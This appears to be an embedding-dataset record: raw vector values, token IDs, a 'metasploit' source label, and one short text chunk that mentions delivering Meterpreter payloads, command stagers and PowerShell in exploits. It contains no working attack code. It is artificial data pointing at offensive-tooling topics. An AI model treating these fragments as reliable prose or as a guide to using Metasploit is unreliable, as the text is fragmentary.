0.4483571946620941, 0.4790763854980469, -0.11435767263174057, 0.24397210776805878, 0.26863324642181396, 1.1151732206344604, -0.19967344403266907, 0.28869298100471497, 0.015544559806585312, -0.5151479244232178, -0.7586982250213623, -0.6123733520507812, -0.17886841297149658, 0.6330110430717468, -0.5203853249549866, 0.7405627369880676, 0.35241809487342834, 0.6123390197753906, -0.3642735183238983, -0.310029000043869, -0.6022828817367554, -1.1279098987579346, 0.2615398168563843, 0.6514971852302551, -0.49498847126960754, 0.5447095036506653, -0.4948018789291382, -0.400875985622406, 1.4108774662017822, 0.6740665435791016, -0.5725379586219788, 1.1591286659240723, 0.4663296043872833, 0.2477203756570816, -0.7478902339935303, 0.3550262451171875, -0.04346061125397682, -0.09427259862422943, -0.6432417035102844, 0.8234648108482361, -0.07440999895334244, 0.0024773222394287586, -0.26260828971862793, -0.1064753457903862, 0.32723942399024963, 0.2917357087135315, 0.25536859035491943, -0.7570195198059082, 0.25766444206237793, 0.7303249835968018, -0.22747795283794403, -0.28576359152793884, -0.057699378579854965, 0.7058793902397156, 0.5012659430503845, 0.7773817777633667, -0.012380101718008518, 0.2667069137096405, -0.016201201826334, 0.006571795791387558, -0.04700031131505966, -0.37728971242904663, -0.25883665680885315, 0.4263986349105835, 0.17166100442409515, 0.4741367697715759, 0.38207823038101196, 0.18716968595981598, 0.18599754571914673, -0.12220127135515213, -0.014421594329178333, 0.6815836429595947, -0.011803180910646915, 0.6305865049362183, 0.45248979330062866, -0.018141811713576317, -1.1582074165344238, -0.7083003520965576, -0.03365858644247055, 0.5211536288261414, -0.08696289360523224, -1.034422755241394, 0.057301852852106094, -0.06267492473125458, -0.5959388017654419, -0.3738465905189514, 0.3902660012245178, 0.5794235467910767, -0.11253742128610611, 0.25822746753692627, 0.0185870174318552, -0.5264976620674133, -0.6205040216445923, -0.23882220685482025, -0.8419156670570374, -0.7054400444030762, -0.8920806646347046, 0.09124180674552917, 0.7482602000236511, -0.4054003059864044, 0.35483598709106445, -0.2103758156299591, -0.4939441978931427, 0.021541396155953407, -0.6648249626159668, 0.6452139616012573, 0.22803901135921478, -0.11511438339948654, -0.8990427255630493, -0.1139361560344696, 0.38540026545524597, 0.6025822758674622, -0.23702512681484222, -0.1921859234571457, 0.2094084620475769, -0.4616004228591919, -0.3924139738082886, -0.03159486874938011, 0.40028437972068787, -0.47578874230384827, 0.10116352885961533, -0.40246492624282837, 1.2460311651229858, 0.3574516177177429, 0.11563775688409805, 0.23066583275794983, -0.647481381893158, 0.8988810777664185, 0.35790780186653137, -0.19260995090007782, 0.74009770154953, 0.4668641984462738, -1.1654132604599, 0.7605741024017334, -0.6234100461006165, 0.21206632256507874, -0.7086050510406494, 0.4005189836025238, -0.32189974188804626, 0.47422346472740173, -0.26919740438461304, 0.020251939073204994, -0.22706633806228638, -0.29844599962234497, -0.4439742863178253, 0.1254166215658188, -0.9746635556221008, 0.37576037645339966, 0.19740793108940125, -0.593588650226593, 0.676540732383728, -0.03541779890656471, -0.22743161022663116, 0.09628736972808838, -0.35644906759262085, 0.8050856590270996, -0.06951620429754257, 0.2894779145717621, 0.12438254058361053, -0.08326724171638489, 0.48283305764198303, 0.14563679695129395, 0.04339626803994179, 0.2488783299922943, 0.32753264904022217, 0.6063624024391174, -0.2512490153312683, 0.2488926351070404, 0.7981391549110413, 0.09139334410429001, 0.07584984600543976, 0.13280026614665985, -0.9316957592964172, 0.1091538518667221, 0.32835468649864197, 0.08154410123825073, 0.04888751357793808, 0.7116366624832153, -0.933739185333252, -0.6177033185958862, 0.10549847036600113, 0.08234592527151108, -0.07605919241905212, 0.10064608603715897, 0.14200975000858307, -0.13936197757720947, -0.1540176123380661, -0.3045598268508911, 0.6615356206893921, 0.09843988716602325, -0.04859926924109459, 0.21623586118221283, 0.4951010048389435, -0.3437458574771881, -0.10687163472175598, 0.23521572351455688, -0.023450659587979317, -0.5483807325363159, 0.42317816615104675, 0.4466935992240906, 0.8198844194412231, -0.21109901368618011, -0.14408282935619354, 0.22661450505256653, 0.5639921426773071, 0.11046424508094788, -0.045547399669885635, -0.4173319637775421, 0.463873028755188, -0.28808051347732544, -0.019778963178396225, -0.6950960755348206, 0.41216716170310974, -0.015710681676864624, 0.388625830411911, -0.24686773121356964, -0.7915542721748352, -0.39639899134635925, 0.8270768523216248, 1.133800745010376, 0.5304668545722961, 0.22355212271213531, 0.7398406267166138, 0.4300479590892792, -0.5863378047943115, 0.43492671847343445, -0.7946978211402893, 0.8549200296401978, -0.1609586924314499, 0.6000618934631348, -0.48715898394584656, -0.29591721296310425, -0.6560662388801575, 0.15515775978565216, -0.7307518124580383, 0.14697962999343872, 0.21136276423931122, -0.41889074444770813, -1.1991442441940308, 0.35651034116744995, 0.1534067839384079, -0.30271032452583313, -0.17843349277973175, -0.24559937417507172, -0.37408703565597534, 0.7381675243377686, 0.2196831852197647, -0.9460889101028442, 0.38615429401397705, -1.1002452373504639, -0.0788675993680954, 0.6934028267860413, -0.14027033746242523, -0.294979065656662, -0.7295826077461243, -0.25320228934288025, -0.44112628698349, 0.0905524492263794, 0.16050167381763458, 1.1366322040557861, 0.2427598387002945, -0.8724682927131653, 0.2516210377216339, 0.626307487487793, -0.4517405033111572, -0.4743034541606903, 0.02039301209151745, 0.31152182817459106, 0.16584338247776031, 0.3946014642715454, -0.38001489639282227, -0.41611623764038086, 0.4810809791088104, -0.6152850985527039, -0.004804380238056183, -0.945426881313324, 0.7628462910652161, -0.015606418251991272, -0.6055037379264832, 0.27205905318260193, 0.3459338843822479, -0.29138118028640747, -0.34583941102027893, -0.5895358920097351, 0.5651066303253174, -0.4481143355369568, -0.5804915428161621, 0.7487372756004333, 0.27746716141700745, -0.34122827649116516, 0.5973899364471436, 0.23389601707458496, -0.7517065405845642, 0.06255839765071869, 0.016004765406250954, -0.28464385867118835, -0.07485684007406235, -0.2985832095146179, 0.2625494599342346, 0.24729427695274353, 0.15895117819309235, 0.4965459406375885, -0.5410884618759155, 0.5768542885780334, -0.21517494320869446, -0.10258684307336807, -0.5130941867828369, -0.5084776878356934, -0.18303270637989044, 0.2985890209674835, -0.03796718642115593, 0.04207983985543251, 0.007320299744606018, -0.049792639911174774, 0.2876470386981964, 0.04468241706490517, -0.549196183681488, -1.3282359838485718, -0.2752264142036438, -0.10154235363006592, 0.275607168674469, -0.12930569052696228, 0.19904647767543793, -0.16758067905902863, -0.6536328792572021, 0.9378827214241028, 0.38324862718582153, 0.004898447077721357, -0.7371339797973633, 0.2950042486190796, -0.967952311038971, -0.04949173331260681, 0.1839812844991684, 0.2781100273132324, -0.4595262110233307, -0.14421628415584564, -0.1416746973991394, 0.8660662174224854, 0.12624140083789825, -0.33123189210891724, -0.46344494819641113, 0.49225378036499023, 0.5931100845336914, -0.8094717264175415, -0.06244054436683655, 0.9580193161964417, -0.5856431126594543, 0.013755189254879951, -0.07197225093841553, -0.3340284526348114, -0.39652132987976074, -0.3947427570819855, 0.31581029295921326, -0.44156450033187866, 0.396850049495697, -0.3468489348888397, -0.5061511993408203, 0.15097740292549133, -0.002178539987653494, -0.19486956298351288, -0.9043967723846436, -0.3227793276309967, -0.1534012258052826, 0.4897889196872711, -0.08575505763292313, -0.1748201698064804, -0.73812335729599, -0.32728928327560425, -0.07359802722930908, 0.6707408428192139, -0.0011769516859203577, -0.3274327516555786, -0.022854086011648178, 0.7032609581947327, 1.002342700958252, 0.430828720331192, -0.2155628800392151, -0.21039798855781555, 0.20319423079490662, -0.11968669295310974, -0.5187390446662903, 0.5936967730522156, -0.11386692523956299, 0.018247980624437332, -0.5872274041175842, -0.19544681906700134, -0.07161872833967209, -0.48798903822898865, 0.15663115680217743, 0.2667574882507324, 0.814400315284729, -0.5432917475700378, 0.24907518923282623, -0.17854753136634827, 0.7293920516967773, 0.7297413349151611, 0.226927250623703, -0.44598203897476196, 0.05264679342508316, -0.5886061191558838, -1.6207826137542725, 0.2447247952222824, -0.17387352883815765, -0.3383546471595764, 0.21631455421447754, -0.5242300033569336, 0.2487119734287262, -0.5695821046829224, 0.30173060297966003, 0.4971466064453125, -0.03739996254444122, 0.2789219319820404, -1.051264762878418, 0.34761473536491394, 0.6441497206687927, -0.22227762639522552, -0.277253657579422, -0.632079541683197, -0.6299080848693848, 0.30436766147613525, -0.4070640802383423, -0.648163378238678, -0.728446900844574, 0.021875793114304543, 0.3955789804458618, -0.3106485605239868, 0.3612390160560608, -0.13728326559066772, -0.4414485991001129, -0.5748202204704285, 0.08625752478837967, 0.29518070816993713, 0.16070814430713654, 0.35687392950057983, 0.36293429136276245, 0.41468533873558044, -0.17384584248065948, -0.048125799745321274, -0.7776732444763184, -0.3099769353866577, 0.6406862735748291, -0.2826406955718994, -0.6021260023117065, 0.8773128986358643, -0.1684490442276001, -0.7922587394714355, -0.3691656291484833, -0.6221315860748291, -0.14742079377174377, -0.04109252989292145, -0.6770369410514832, -0.5593839287757874, 0.17011645436286926, -0.31491196155548096, -0.03846330940723419, 0.5334805250167847, 0.7765615582466125, 0.4362325966358185, -0.8063644170761108, -0.10820864140987396, -0.4373854696750641, 0.4138525426387787, 0.8304962515830994, -0.407938688993454, -0.16736522316932678, -0.8655335307121277, -0.675435483455658, 0.2281569391489029, -0.20097559690475464, 1.1056684255599976, -0.30666372179985046, 0.650873601436615, 0.21440568566322327, 0.21142564713954926, 0.6071721911430359, 0.0032634378876537085, 0.0916738212108612, 1.1015249490737915, -0.009997723624110222, -0.7263134717941284, -0.7485635876655579, 0.2935633659362793, 0.12302856147289276, -0.012332098558545113, -0.21885377168655396, -0.0024414262734353542, -0.06104056164622307, -0.07070490717887878, -0.37038862705230713, -0.6010826826095581, -0.7960349917411804, -0.5642279386520386, -0.4928625822067261, 0.37126681208610535, -0.24227496981620789, -0.3502882719039917, 0.6289481520652771, -0.46015664935112, -0.22091510891914368, -0.3411240577697754, 0.9024646878242493, -0.6714749932289124, 0.23184695839881897, -0.536655604839325, 0.1260005086660385, -1.0737470388412476, 0.008477632887661457, 0.026877857744693756, -0.2236936092376709, -0.2619534730911255, 0.32022765278816223, -0.4940887987613678, -0.22600167989730835, -0.6086450219154358, 1.2430882453918457, -0.40266984701156616, 0.1997441202402115, 0.11064974218606949, -0.6753743290901184, 0.325572669506073, 0.5050640106201172, -0.09111977368593216, -0.12338796257972717, 0.4954751133918762, -0.6477818489074707, 0.16246016323566437, -0.4321215748786926, -0.5311238765716553, 0.15982095897197723, 0.3525339663028717, 0.6492127776145935, 0.2573152184486389, -0.4699598252773285, -0.01700381562113762, 0.6319431662559509, -0.7022335529327393, -0.04630090296268463, -0.671575665473938, 0.2592746913433075, 0.6953367590904236, -0.04859628155827522, 0.05414252728223801, 0.6345311403274536, 0.4924441874027252, 0.8745973706245422, -0.27944669127464294, 0.7158637642860413, 0.27699562907218933, 0.21706491708755493, -0.04823264107108116, 0.08772658556699753, 0.7788169980049133, -0.8455873131752014, 0.287462055683136, 0.13830262422561646, -0.6853582859039307, 1.0043758153915405, 0.563556432723999, 0.048478491604328156, -0.11516425758600235, -0.1752854734659195, -0.34786131978034973, 0.21400117874145508, 0.2074168175458908, 0.40205129981040955, 0.6222647428512573, -0.26686325669288635, -0.5054636001586914, 0.484996497631073, -0.5029447078704834, -0.5179741978645325, 0.22419539093971252, -0.5530833005905151, -0.01637786068022251, -0.7085579037666321, -0.3675663471221924, -0.3422640562057495, 0.11234335601329803, -0.19457024335861206, 0.3352739214897156, 0.4224143326282501, -0.49910518527030945, 1.3381315469741821, -0.5445066690444946, -0.8377847671508789, -0.3874894380569458, 0.29416754841804504, -1.231524109840393, -1.369364619255066, -0.1182151660323143, 0.41496506333351135, -0.003986414056271315, -0.01664646714925766, -0.40439528226852417, 0.17914195358753204, 0.42689675092697144, 0.33495840430259705, -0.16074208915233612, -0.08734945952892303, -0.368566632270813, 0.4237433969974518, -0.2788435220718384, 0.3994833528995514, 0.30702313780784607, 0.17288872599601746, 0.36565160751342773, -0.21748356521129608, -0.5989571809768677, 0.4120325446128845, 0.3682151138782501, 0.35178589820861816, 0.35430192947387695, 0.08935346454381943, 0.5128419399261475, -0.06519033014774323, -0.32198524475097656, -0.34440919756889343, 0.6569492816925049, 0.24646471440792084, 0.43163901567459106, 0.23192089796066284, 0.31461912393569946, 0.7616809010505676, -0.8138550519943237, -0.6964844465255737, 0.49965161085128784, 0.06159978359937668, -0.2140478491783142, 0.42961424589157104, -0.26881808042526245, 0.17473044991493225, 0.37510353326797485, -0.009961213916540146, 0.3888113796710968, -0.0002462401462253183, 0.10427384823560715, 0.008347304537892342, -0.2020891308784485, 0.5067803263664246, -0.7347076535224915, 0.5590565800666809, -0.39609819650650024, -0.4493750333786011, 0.165670707821846, -0.29862356185913086, -0.42243900895118713, 0.5261901021003723, 0.8509187698364258, 0.5316102504730225, 0.0010550008155405521, 0.6945134997367859, -0.13181255757808685, 0.44147735834121704, 0.36152034997940063, -0.30342811346054077, -0.44479671120643616, 0.13572150468826294, -0.11488568782806396, -0.902807891368866, -0.6180654764175415, 0.26931315660476685, 0.25520750880241394, -0.48168352246284485, 0.693963885307312, -0.33836328983306885, 0.11259977519512177, -0.20855598151683807, 0.5711901187896729, -0.18275190889835358, -0.49515461921691895, 0.5483682155609131, -0.002576208207756281, -0.1837490350008011, 0.914505660533905, -0.27010518312454224, 0.7252876162528992, 0.06728031486272812, 1.0632641315460205, -0.4586913585662842, 0.4978267550468445, 0.07347255945205688, 0.24405285716056824, -0.6829854846000671, 0.388752281665802, -0.15525372326374054, -0.7198302149772644, 0.1334659904241562, -0.2011578530073166, 0.5500220656394958, -0.8655622005462646, 0.0034042554907500744, -0.8591204285621643, 0.40345054864883423, -0.5125249028205872, -0.7010695338249207, 0.6088708639144897, 0.12371651083230972, -0.8788981437683105, 0.32786333560943604, 0.05983275920152664, 0.4182879328727722, 0.756854772567749, -0.4767700731754303, -0.2761858403682709, -0.7433951497077942, -0.2929866909980774, 0.04250511899590492, 0.6867366433143616, -0.3293195366859436, -0.24782578647136688, -0.014625255018472672, -0.9735962152481079, -0.8464102149009705, -0.42249414324760437, -0.13150866329669952, -0.1399809867143631, 0.708046019077301, 0.9775575995445251, 0.498943567276001, 0.05908696725964546, -0.10840912908315659, -0.37991124391555786, 0.28963977098464966, 1.0656729936599731, -0.39084097743034363, 0.7187128663063049, 0.383048415184021, -0.14371073246002197, -0.20528960227966309, -0.2802431881427765, 0.4970096945762634, -0.6417217254638672, 0.6166204214096069, -0.1674523949623108, 0.18026891350746155, -0.36258992552757263, -0.13202562928199768, -0.2954377233982086, 0.3650248944759369, 0.19560030102729797, -0.31549474596977234, -0.8343418836593628, 0.23458954691886902, -0.43560346961021423, -0.39960747957229614, -0.30530083179473877, 0.022569239139556885, 0.7617166042327881, 0.17531053721904755, 0.6540452837944031, -1.2819621562957764, 4.376383304595947, 0.3046048581600189, 0.3436947762966156, 0.3378007113933563, -0.1577000916004181, 1.2186822891235352, 0.9444561004638672, -0.8020918369293213, 0.6577744483947754, -0.389664888381958, 0.051087670028209686, 0.0922594666481018, 0.28932714462280273, 0.012761940248310566, 0.5336316227912903, 0.865049421787262, -0.6008728742599487, 0.4358901083469391, 0.42285487055778503, -0.9194674491882324, -1.215926170349121, 0.03371747210621834, -0.4031465947628021, 0.34064000844955444, 0.1913696527481079, -0.1833215057849884, 0.30716052651405334, -0.00969614926725626, -0.4238564968109131, 0.11351685971021652, -0.4267527163028717, -0.4902900755405426, -0.45272427797317505, -0.30523163080215454, -0.9423402547836304, 0.2651716470718384, -0.14320018887519836, -0.5193867087364197, -0.21083173155784607, -0.1695411205291748, 0.04250432550907135, -0.6360170841217041, 0.07605043053627014, -0.4116954803466797, -0.10175208747386932, 0.4058600962162018, -0.4311494529247284, 0.45682626962661743, 0.5426734089851379, -0.6045989990234375, 1.0435444116592407, -0.18501593172550201, 0.45982417464256287, -0.12258778512477875, -0.6910783052444458, 0.37395891547203064, 0.08982232213020325, -0.5523999333381653, -0.4037645161151886, -0.44852375984191895, 1.1256834268569946, -0.31552401185035706, -0.48242565989494324, -0.07136547565460205, -1.0760737657546997, 0.9145050048828125, -0.6143487095832825, -0.028020475059747696, -0.7216390371322632, 0.09293487668037415, -0.30173948407173157, -0.49042457342147827, -0.4201911389827728, -0.10473319888114929, 0.9474321007728577, -0.42530834674835205, -0.2856309711933136, 0.3837724030017853, 0.08823642879724503, -0.04742741584777832, 0.2380550503730774, -0.23252616822719574, -1.2882014513015747, 0.35299551486968994, 0.44585591554641724, 0.5698115825653076, -0.4741273820400238, -1.005827784538269, 0.05979308485984802, 0.4888347387313843, 0.4166216254234314, 0.565775990486145, -0.1847635805606842, 0.257686972618103, -0.040561825037002563 ]
[ 1012, 21144, 2003, 2800, 1999, 1996, 5906, 1013, 18093, 2015, 1013, 1061, 17063, 11610, 2140, 14176, 1012, 1996, 9918, 2005, 2023, 6994, 2024, 13115, 2007, 2216, 1997, 1061, 17063, 11610, 2140, 1012, 5658, 1010, 4352, 1996, 9918, 1997, 3937, 1999, 19152, 2015, 2000, 2022, 1996, 2168, 1012, 2009, 2323, 2022, 3264, 2174, 2008, 1996, 3569, 11721, 28682, 1998, 4289, 7747, 2024, 2025, 1996, 2168, 1012, 2393, 6434, 1024, 8192, 1024, 1012, 1013, 11089, 1035, 5658, 1012, 21144, 1031, 7047, 1033, 9699, 1037, 1012, 5658, 4078, 11610, 22731, 18093, 2008, 2097, 15389, 2019, 4082, 2291, 3094, 2478, 1996, 9675, 11721, 24291, 4677, 1998, 4289, 3334, 1012, 2800, 4289, 7747, 1024, 1008, 12441, 14192, 20097, 1008, 3050, 14192, 20097, 1008, 7815, 14192, 20097, 2800, 11721, 24291, 8859, 1024, 1008, 3793, 14192, 19321, 2075, 15532, 21572, 4842, 7368, 1008, 2828, 8663, 25608, 14728, 23115, 3686, 1008, 3645, 5178, 16778, 3723, 2742, 1024, 1012, 1013, 11089, 1035, 5658, 1012, 21144, 1011, 1039, 1000, 5658, 5310, 5796, 2546, 5796, 2546, 1013, 5587, 1000, 1011, 1042, 12441, 14192, 20097, 1011, 1043, 3793, 14192, 19321, 2075, 15532, 21572, 4842, 7368, 3563, 7047, 1024, 1011, 1039, 1010, 1011, 1011, 3094, 1026, 5164, 1028, 1996, 3094, 2000, 2448, 1011, 1042, 1010, 1011, 1011, 4289, 3334, 1026, 5164, 1028, 1996, 4289, 3334, 2000, 2224, 1006, 12398, 1024, 12441, 14192, 20097, 1007, 1011, 1043, 1010, 1011, 1011, 11721, 24291, 1026, 5164, 1028, 1996, 11721, 24291, 4677, 2000, 2224, 1006, 12398, 1024, 3793, 14192, 19321, 2075, 15532, 21572, 4842, 7368, 1007, 1011, 1051, 1010, 1011, 1011, 6434, 1026, 5164, 1028, 1996, 6434, 4289, 2000, 2224, 1006, 12398, 1024, 6315, 1010, 2156, 1024, 1011, 1011, 2862, 1011, 6434, 1011, 11630, 1007, 1011, 1011, 2862, 1011, 6434, 1011, 11630, 2862, 2800, 6434, 11630, 1010, 2005, 2224, 2007, 1011, 1011, 6434, 1011, 1044, 1010, 1011, 1011, 2393, 2265, 2023, 4471, 1996, 1011, 1043, 1013, 1011, 1011, 11721, 24291, 5724, 7341, 2000, 1996, 11721, 24291, 1035, 4677, 6685, 2005, 1996, 9699, 4972, 2096, 1996, 1011, 1042, 1013, 1011, 1011, 4289, 3334, 9918, 7341, 2000, 1996, 4289, 3334, 6685, 1012, 2437, 3431, 4215, 4667, 2047, 11721, 24291, 8859, 1998, 4289, 7747, 7336, 4526, 1037, 2047, 5371, 1999, 1996, 7972, 3075, 14176, 1024, 5622, 2497, 1013, 5796, 2546, 1013, 21183, 4014, 1013, 11089, 1035, 5658, 1035, 4078, 11610, 22731, 1012, 1996, 1523, 3128, 1524, 11721, 24291, 4677, 2828, 2003, 7528, 2206, 1996, 5796, 1011, 17212, 29292, 4289, 1998, 1996, 14187, 6790, 2636, 2004, 4225, 1999, 4127, 1013, 4942, 4305, 2890, 16761, 2100, 1012, 2320, 1996, 2047, 11721, 24291, 4677, 2030, 4289, 3334, 2003, 7528, 1010, 2009, 3791, 2000, 2022, 2794, 2000, 1996, 2364, 3075, 5371, 1006, 11089, 1035, 5658, 1035, 4078, 11610, 22731, 1012, 21144, 1007, 1012, 2144, 7642, 3989, 4677, 9699, 2003, 28283, 25300, 10074, 1010, 1037, 3131, 3231, 2323, 2022, 2794, 2005, 2151, 2047, 11721, 24291, 4677, 2000, 5676, 2008, 1996, 14148, 2819, 1997, 1996, 12441, 14192, 20097, 6630, 2003, 8335, 1012, 2582, 15324, 2378, 3401, 1996, 1012, 5658, 4078, 11610, 22731, 11721, 28682, 2448, 4082, 2291, 10954, 1010, 1996, 2206, 4219, 2064, 2022, 14044, 2005, 11336, 9797 ]
metasploit
132.txt
1
to deliver native payloads such as meterpreter. how to use command stagershow to use powershell in an exploit [SEP]
[ 0.04861019551753998, -0.008614695630967617, -0.12510812282562256, 0.17292693257331848, -1.2314791679382324, -0.22378909587860107, -1.0260902643203735, 0.6935495734214783, 0.1734146922826767, 0.5611010193824768, 0.464214950799942, -0.11229074001312256, 0.5489521622657776, -0.5553643107414246, -0.27269691228866577, 0.4632599353790283, 0.5455685257911682, -0.3450878858566284, -0.8283960819244385, -0.14313393831253052, 0.20054562389850616, 0.541625440120697, -0.7720587849617004, -0.30454137921333313, -0.3661150336265564, -0.18665915727615356, -0.3837583363056183, -0.453894704580307, 0.6130498647689819, 0.7530591487884521, -0.21277570724487305, -0.03188740089535713, 0.14008422195911407, -0.39370521903038025, 0.15694279968738556, -0.6461801528930664, -0.060268256813287735, -0.6025806069374084, -0.2470799684524536, -0.9903126358985901, 0.17051200568675995, 0.6136906147003174, -0.08205124735832214, -0.6584042310714722, -0.599427342414856, -0.3000371754169464, 0.22333906590938568, 0.18645362555980682, 0.203023299574852, 0.5956869721412659, -0.7951732277870178, 0.3366861045360565, 0.049636803567409515, -0.47307175397872925, 0.11052647233009338, -0.3636544346809387, -0.13616091012954712, -0.8381880521774292, -0.35695526003837585, -0.18316210806369781, 0.1445334106683731, 0.3436005413532257, -0.25240904092788696, -0.5730647444725037, 0.21586881577968597, 0.18401853740215302, -0.17402265965938568, -0.8080732822418213, -0.26099786162376404, -0.24142958223819733, -0.24038538336753845, 0.83101886510849, 0.02585030160844326, -0.7284393310546875, -0.07455529272556305, -0.0506901815533638, 0.18613027036190033, 0.389760822057724, 0.6979107856750488, 1.3678866624832153, 0.24490337073802948, 0.39255353808403015, 0.14180508255958557, -0.16079236567020416, -0.1251830756664276, -0.3981122672557831, 0.6535815596580505, -0.2484814077615738, 0.03150256350636482, 0.19053152203559875, 0.35211363434791565, 0.24074050784111023, -0.6051472425460815, -0.27054569125175476, 0.12703686952590942, 0.4009343385696411, -0.5984911918640137, 0.09730107337236404, -0.3412720859050751, 0.09554781764745712, 0.6805016994476318, 0.4637400805950165, -0.2747942805290222, 0.19169995188713074, -0.40991711616516113, 0.7305824756622314, 0.5167444944381714, -0.07998856902122498, -1.2478796243667603, -0.15559208393096924, 0.4850495159626007, -0.5944876670837402, -0.12336020171642303, -0.03032493218779564, 0.01999702677130699, 0.14833009243011475, 0.10144659876823425, 0.3609063923358917, -0.275768905878067, -0.2716410458087921, 0.6413725018501282, -1.5093839168548584, -0.1583644300699234, -0.7884920239448547, -0.016671378165483475, -0.40837883949279785, 0.07619337737560272, 0.3219565749168396, -0.8024023771286011, -0.6787803769111633, 0.5129593014717102, -0.6932658553123474, 0.6043327450752258, 0.3440101146697998, 0.14989088475704193, 0.9027078151702881, -0.529714822769165, -0.18713407218456268, 0.9498500823974609, -0.44616883993148804, -0.27502158284187317, -0.1793660968542099, 0.7739525437355042, 1.7388584613800049, 0.061362385749816895, 0.7401511073112488, -0.07026804238557816, -0.02421659603714943, -0.8080745935440063, 0.5865215063095093, 0.017145127058029175, -0.2873106300830841, -0.12301842868328094, 0.6068909168243408, 0.3071635067462921, -0.4044058322906494, -0.23932380974292755, 0.19727233052253723, 0.6810718774795532, 0.8782665133476257, -0.09826584160327911, 0.40880465507507324, -0.8587997555732727, 0.6847127079963684, -0.5241597294807434, 0.3541747033596039, -0.9467108249664307, -1.0081554651260376, 0.17045865952968597, -0.4721181094646454, 0.19351302087306976, -0.37687861919403076, -0.1431390345096588, -0.1706189662218094, 0.6419306993484497, -0.1647915542125702, 0.2305009961128235, 0.7755200862884521, 0.3310491144657135, -0.19522537291049957, -0.8016265034675598, 0.4394286870956421, 0.000888256065081805, 0.7469815611839294, 0.27061572670936584, -0.1620422750711441, 0.16691015660762787, 0.1694341003894806, -0.6962890625, 0.008605780079960823, 0.8483197689056396, 0.8868131041526794, -0.6422485709190369, -0.3535493016242981, 0.30218663811683655, 0.5532039403915405, -0.49172070622444153, 0.17491498589515686, -0.16569487750530243, -0.16161350905895233, -0.5139198303222656, 0.08182861655950546, -0.8842769861221313, 0.14506928622722626, -0.2177882194519043, -0.02863134630024433, 0.9495389461517334, 0.6176663041114807, -0.5651564002037048, -0.16417963802814484, 0.5582563877105713, 0.3791907727718353, -1.0164837837219238, -0.457425981760025, 0.28906378149986267, -0.10852117836475372, -0.07929128408432007, 0.18418726325035095, 0.6950657963752747, 0.42848825454711914, -0.3349553644657135, 0.3592679798603058, 0.6954039335250854, 0.021017013117671013, -0.19227394461631775, -0.7584446668624878, -0.25792834162712097, 0.6854042410850525, -0.5091913938522339, 0.6676507592201233, -0.49041569232940674, 0.27063754200935364, -0.4493366777896881, 0.369326651096344, 0.30812835693359375, 0.24193322658538818, 0.3577631413936615, -0.3606511652469635, 0.40430259704589844, 0.0703047513961792, 0.5313546061515808, 0.4801176190376282, -0.04717991128563881, 0.4342728853225708, 0.1331315040588379, 0.1722467988729477, -0.05983036011457443, -0.26853689551353455, -0.0033381744287908077, 0.880257785320282, -0.4463726282119751, 0.7584739923477173, -0.2594384551048279, -0.1426098793745041, -0.3779439628124237, 0.13259151577949524, -0.03251790627837181, 0.9275539517402649, -0.5354281663894653, 0.09850023686885834, 0.3534325659275055, 0.5887898206710815, -0.7260833382606506, 0.3097951114177704, 0.11145221441984177, 0.12763777375221252, 0.6164021492004395, -0.35525479912757874, -0.471746563911438, -0.056701626628637314, -0.611345112323761, -0.4358484745025635, -0.40527594089508057, -0.2673953175544739, -1.11481773853302, -0.6407036185264587, 0.195757657289505, -0.12513886392116547, 0.05107211321592331, -0.746842622756958, 0.5450389385223389, -0.3187633752822876, -0.025356069207191467, 0.5284731984138489, 1.250458836555481, 0.1534946858882904, -0.8975047469139099, 0.42619913816452026, -0.6872774362564087, 0.34234869480133057, -0.5376967191696167, 0.2782079875469208, -0.09699063003063202, 0.07166509330272675, -0.21591012179851532, -0.23497197031974792, -0.054831571877002716, 0.1437806934118271, 0.21007010340690613, 0.43927261233329773, -0.758578360080719, 0.1300448775291443, 0.32906508445739746, 0.2851752042770386, -0.413491427898407, 0.3572022318840027, 0.38054850697517395, -0.5414344072341919, 0.6468406915664673, 0.7444537281990051, -0.5633862018585205, 0.864660382270813, 0.06684579700231552, 0.11673390120267868, -1.0925458669662476, 1.5510667562484741, 0.31131798028945923, -0.49862369894981384, -1.0378704071044922, -0.6362820267677307, -0.4138983190059662, -0.2052982747554779, 0.2458656281232834, -0.657291829586029, -0.31726035475730896, 0.6647118926048279, -0.2604745626449585, -1.2238998413085938, 0.5023193359375, 0.1136251911520958, 0.6766243577003479, 0.24216657876968384, -0.7272318005561829, 0.18200048804283142, -0.16934718191623688, 0.6612241864204407, -0.6498437523841858, -0.11913018673658371, -0.4383713901042938, -0.19292841851711273, -0.523406445980072, -0.781818151473999, 0.3571135699748993, 0.380132257938385, -0.4121350646018982, 0.5123769640922546, 0.16791190207004547, -0.6159803867340088, 0.16752690076828003, -0.6764156222343445, -0.25411930680274963, -0.2551201581954956, 0.07721882313489914, 0.25551170110702515, 0.7065492868423462, 0.8028717637062073, -1.049530029296875, -0.1116071492433548, -0.16040460765361786, 0.577046275138855, -0.3371109962463379, 0.364714652299881, 0.2627837359905243, -0.5457087755203247, -0.10823453962802887, -0.685924232006073, -0.7142634987831116, 0.8606680631637573, 0.7177088260650635, -1.1204651594161987, 0.00510319322347641, -0.26327767968177795, 0.11169631034135818, 0.6160306334495544, -0.3509722054004669, -0.23765970766544342, 0.2911214232444763, 0.36050453782081604, 0.029683483764529228, -0.29356303811073303, -0.43480542302131653, -0.49399232864379883, 0.3344602584838867, 0.2330784946680069, -0.01627647504210472, -0.5289748311042786, -0.24560223519802094, -0.19029904901981354, -0.09313517808914185, -0.47928497195243835, -0.4024893641471863, 0.18767604231834412, 0.489198237657547, 0.6455333232879639, -0.565312385559082, -0.7999173402786255, 0.24159792065620422, 0.320281445980072, 0.711884617805481, 0.7150535583496094, 0.6796658039093018, -0.16279180347919464, 0.4188742935657501, 0.5960209965705872, -0.20881149172782898, 0.6620306968688965, 0.04828411340713501, 0.3463103175163269, 0.24776294827461243, 0.15200971066951752, 0.26871630549430847, 0.07232288271188736, -0.08182289451360703, 0.6937717199325562, -0.4304620027542114, -0.2752700448036194, -0.3791888654232025, 0.7994241714477539, -0.23463791608810425, -0.22101275622844696, 0.24797455966472626, -0.2654997408390045, -0.41830670833587646, 0.11224379390478134, 1.4474514722824097, -0.5250415205955505, -0.4635673761367798, 0.09665630757808685, 0.40126121044158936, 0.7055560350418091, -0.17916680872440338, -0.48986780643463135, -0.36358413100242615, -0.7394415736198425, -0.724698007106781, 1.1321552991867065, 0.8251815438270569, 0.36041393876075745, -0.5619939565658569, -0.2586618661880493, 0.16955718398094177, 0.0034545797389000654, -0.28259867429733276, 0.048770345747470856, 0.036229588091373444, -0.12913626432418823, 0.8736407160758972, -0.6082386374473572, -0.20575737953186035, -0.12248028069734573, -0.12449567764997482, 